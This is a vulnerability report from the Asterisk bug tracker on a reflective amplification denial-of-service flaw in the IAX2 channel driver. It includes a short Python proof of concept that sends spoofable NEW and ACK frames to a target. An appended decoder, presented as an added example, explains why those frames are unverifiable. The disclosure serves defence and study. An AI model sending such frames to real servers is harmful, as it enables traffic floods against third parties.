
Summary: ASTERISK-11880: IC_NEW + IC_ACK recreates reflective amplification DoS
Reporter: Joel R. Voss (javantea)
Labels:
Date Opened: 2008-04-18 13:22:15
Date Closed: 2008-04-18 13:24:49
Priority: Major
Regression?: No
Status: Closed/Complete
Components: Channels/chan_iax2
Versions:
Frequency of Occurrence:
Related Issues:
Environment:
Attachments:
Description:The original protocol flaw with IC_NEW was documented here. http://bugs.digium.com/view.php?id=10078
IC_NEW creates a new unauthenticated call with servers that allow it.
The fix that Asterisk added simply required an IC_ACK which can also be spoofed. I wanted to create a new issue since it isn't exactly the same as the old issue. I released the exploit as a framework here:
https://www.altsci.com/concepts/page.php?s=asteri&p=2
I will be speaking at Toorcon Seattle 2008 about this issue.
http://seattle.toorcon.org/2008/conference.php?id=12
I was able to cause Asterisk to send 8 Mbps for 30+ seconds today using this attack without causing any harm to the system. The cost to the attacker is 30 kB. This is a 1000:1 amplification.

****** ADDITIONAL INFORMATION ******

Here is a minimal implementation of the attack to show how simple it is (riax2.py):
from socket import socket, AF_INET, SOCK_DGRAM

host, port = '192.168.0.3', 4569   # target Asterisk IAX2 listener (UDP 4569)

s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
print('Connected:', s.getsockname())

# IAX2 full frame: source call 0xeb (F bit set), dest call 0, timestamp 1,
# oseqno 0, iseqno 0, frame type 6 (IAX), subclass 1 (NEW), followed by a
# 4-byte CAPABILITY information element (type 8, length 4).
new_packet = b'\x80\xeb\x00\x00\x00\x00\x00\x01\x00\x00\x06\x01\x08\x04\x00\x00\x02\xaa'
# Same header with timestamp 10 and subclass 4 (ACK); no information elements.
ack_packet = b'\x80\xeb\x00\x00\x00\x00\x00\x0a\x00\x00\x06\x04'

s.send(new_packet)
a = s.recv(1024)   # server's reply to the unauthenticated NEW
s.send(ack_packet)
b = s.recv(1024)   # whatever the server sends once the ACK is accepted
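To see exactly what the two frames in riax2.py say on the wire, here is a small IAX2 full-frame decoder and encoder applied to them. This is an added example, not part of the original report or of Asterisk's code; the header layout, IAX subclass numbers, information-element (IE) types and codec bitmask follow RFC 5456, and the two byte strings are copied from the listing above. Decoding shows that the NEW carries only a CAPABILITY IE (no USERNAME or other caller-identifying IE) and that the ACK carries no IEs at all, which is why both are trivially spoofable from an arbitrary source address.

```python
"""Decode/encode IAX2 full frames; applied to the two frames posted in riax2.py.

Added example (not from the original report or Asterisk). Field layout, frame
types, IAX subclasses, IE types and codec bits follow RFC 5456.
"""
import struct

# The two frames from riax2.py on this page (copied verbatim).
NEW_PACKET = b'\x80\xeb\x00\x00\x00\x00\x00\x01\x00\x00\x06\x01\x08\x04\x00\x00\x02\xaa'
ACK_PACKET = b'\x80\xeb\x00\x00\x00\x00\x00\x0a\x00\x00\x06\x04'

FRAME_TYPE_IAX = 6  # frame type carrying IAX2 signalling (RFC 5456 section 8.2)

IAX_SUBCLASS = {    # RFC 5456 section 8.4 (subset)
    1: 'NEW', 2: 'PING', 3: 'PONG', 4: 'ACK', 5: 'HANGUP', 6: 'REJECT',
    7: 'ACCEPT', 8: 'AUTHREQ', 9: 'AUTHREP', 10: 'INVAL',
}
IE_NAME = {         # RFC 5456 section 8.6 (subset)
    1: 'CALLED_NUMBER', 2: 'CALLING_NUMBER', 6: 'USERNAME', 7: 'PASSWORD',
    8: 'CAPABILITY', 9: 'FORMAT', 11: 'VERSION',
}
CODEC_BITS = {      # RFC 5456 section 8.7 media format bitmask
    0x0001: 'G.723.1', 0x0002: 'GSM', 0x0004: 'G.711 ulaw', 0x0008: 'G.711 alaw',
    0x0010: 'G.726', 0x0020: 'ADPCM', 0x0040: 'SLIN16', 0x0080: 'LPC10',
    0x0100: 'G.729', 0x0200: 'Speex', 0x0400: 'iLBC',
}

# 12-byte full-frame header: scallno, dcallno, timestamp, oseqno, iseqno, type, subclass
HDR = struct.Struct('!HHIBBBB')


def parse_full_frame(pkt):
    """Return header fields plus a {ie_type: bytes} dict; ValueError on malformed input."""
    if len(pkt) < HDR.size:
        raise ValueError('frame shorter than the 12-byte full-frame header')
    scall, dcall, ts, oseq, iseq, ftype, sub = HDR.unpack_from(pkt)
    if not scall & 0x8000:
        raise ValueError('F bit clear: this is a mini frame, not a full frame')
    ies = {}
    off = HDR.size
    while off < len(pkt):
        if off + 2 > len(pkt):
            raise ValueError('truncated IE header at offset %d' % off)
        ie_type, ie_len = pkt[off], pkt[off + 1]
        data = pkt[off + 2:off + 2 + ie_len]
        if len(data) != ie_len:
            raise ValueError('IE %d claims %d bytes, only %d present' % (ie_type, ie_len, len(data)))
        ies[ie_type] = data
        off += 2 + ie_len
    return {
        'scallno': scall & 0x7FFF,        # 15-bit source call number
        'dcallno': dcall & 0x7FFF,        # 15-bit destination call number
        'retransmit': bool(dcall & 0x8000),
        'timestamp': ts,
        'oseqno': oseq,
        'iseqno': iseq,
        'type': ftype,
        'subclass': sub & 0x7F,           # C bit stripped
        'ies': ies,
    }


def build_full_frame(scallno, dcallno, timestamp, oseqno, iseqno, ftype, subclass, ies=()):
    """Inverse of parse_full_frame; `ies` is a sequence of (type, bytes) pairs."""
    body = b''.join(bytes((t, len(d))) + d for t, d in ies)
    return HDR.pack(0x8000 | scallno, dcallno, timestamp, oseqno, iseqno, ftype, subclass) + body


def codecs(capability_ie):
    """Expand a 4-byte CAPABILITY/FORMAT IE into sorted codec names."""
    mask = struct.unpack('!I', capability_ie)[0]
    return sorted(name for bit, name in CODEC_BITS.items() if mask & bit)


def describe(pkt):
    """One-line summary such as 'ACK scall=235 dcall=0 ts=10 ies=[]'."""
    f = parse_full_frame(pkt)
    if f['type'] == FRAME_TYPE_IAX:
        kind = IAX_SUBCLASS.get(f['subclass'], 'IAX/%d' % f['subclass'])
    else:
        kind = 'type%d/%d' % (f['type'], f['subclass'])
    ie_names = [IE_NAME.get(t, 'IE%d' % t) for t in f['ies']]
    return '%s scall=%d dcall=%d ts=%d ies=%s' % (
        kind, f['scallno'], f['dcallno'], f['timestamp'], ie_names)


if __name__ == '__main__':
    for pkt in (NEW_PACKET, ACK_PACKET):
        print(describe(pkt))
    print('NEW advertises:', codecs(parse_full_frame(NEW_PACKET)['ies'][8]))
```

Run stand-alone it prints the NEW as source call 235, destination call 0, timestamp 1 with a single CAPABILITY IE (GSM, A-law, ADPCM, LPC10 and Speex), and the ACK as the same source call with timestamp 10 and nothing else. The builder reproduces both byte strings exactly, so the same code can be pointed at a pcap of UDP/4569 traffic to check whether frames arriving from one source address carry any IE a receiver could actually verify.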
Comments: